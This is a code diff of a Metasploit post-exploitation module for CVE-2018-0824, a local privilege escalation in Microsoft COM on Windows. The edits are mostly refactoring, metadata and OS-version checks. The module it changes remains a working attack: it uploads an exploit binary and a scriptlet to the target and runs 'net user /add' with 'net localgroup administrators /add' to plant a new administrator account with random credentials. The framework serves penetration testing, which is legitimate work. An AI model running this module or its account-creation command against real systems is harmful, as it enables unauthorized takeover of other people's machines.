@@ -5,7 +5,7 @@
 class MetasploitModule < Msf::Post
   include Msf::Post::Common
   include Msf::Post::File
-  #  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Version
 
   def initialize(info = {})
     super(
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post
         'Name' => 'Windows unmarshal post exploitation',
         'Description' => %q{
           This module exploits a local privilege escalation bug which exists
-          in microsoft COM for windows when it fails to properly handle serialized objects.
+          in Microsoft COM for Windows when it fails to properly handle serialized objects.
         },
         'References' => [
           ['CVE', '2018-0824'],
@@ -39,6 +39,11 @@ class MetasploitModule < Msf::Post
             ]
           }
         },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'Reliability' => []
+        }
       )
     )
 
@@ -59,8 +64,8 @@ class MetasploitModule < Msf::Post
   def setup
     super
     validate_active_host
-    @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
-    @script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..13)
+    @script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha(6..13)
     @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
     @script_name = "#{script_name}.sct" unless script_name.match(/\.sct$/i)
     @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
@@ -69,8 +74,8 @@ class MetasploitModule < Msf::Post
   end
 
   def populate_command
-    username = Rex::Text.rand_text_alpha((rand(8) + 6))
-    password = Rex::Text.rand_text_alpha((rand(8) + 6))
+    username = Rex::Text.rand_text_alpha(6..13)
+    password = Rex::Text.rand_text_alpha(6..13)
     print_status("username = #{username}, password = #{password}")
     cmd_to_run = 'net user /add ' + username + ' ' + password
     cmd_to_run += '  & net localgroup administrators /add ' + username
@@ -79,12 +84,10 @@ class MetasploitModule < Msf::Post
   end
 
   def validate_active_host
-    begin
-      print_status("Attempting to Run on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
-    rescue Rex::Post::Meterpreter::RequestError => e
-      elog(e)
-      raise Msf::Exploit::Failed, 'Could not connect to session'
-    end
+    print_status("Attempting to Run on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+  rescue Rex::Post::Meterpreter::RequestError => e
+    elog(e)
+    raise Msf::Exploit::Failed, 'Could not connect to session'
   end
 
   def validate_remote_path(path)
@@ -97,8 +100,9 @@ class MetasploitModule < Msf::Post
     if sysinfo['Architecture'] == ARCH_X86
       fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
     end
-    if sysinfo['OS'] =~ /XP/
-      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    version = get_version_info
+    unless version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win10_1803)
+      fail_with(Failure::Unknown, 'The exploit does not support this OS')
     end
   end
 
@@ -127,11 +131,12 @@ class MetasploitModule < Msf::Post
     script_template_data = ::IO.read(local_script_template_path)
     vprint_status("script_template_data.length =  #{script_template_data.length}")
     full_command = 'cmd.exe /c ' + cmd_to_run
-    full_command = full_command
     script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)
-    if script_data == nil
-      fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
+
+    if script_data.nil?
+      fail_with(Failure::BadConfig, 'Failed to substitute command in script_template')
     end
+
     vprint_status("Writing #{script_data.length} bytes to #{script_path} to target")
     write_file(script_path, script_data)
     vprint_status('Script uploaded successfully')
@@ -170,9 +175,5 @@ class MetasploitModule < Msf::Post
       ensure_clean_destination(script_path)
     end
   end
-  attr_reader :exploit_name
-  attr_reader :script_name
-  attr_reader :temp_path
-  attr_reader :exploit_path
-  attr_reader :script_path
+  attr_reader :exploit_name, :script_name, :temp_path, :exploit_path, :script_path
 end
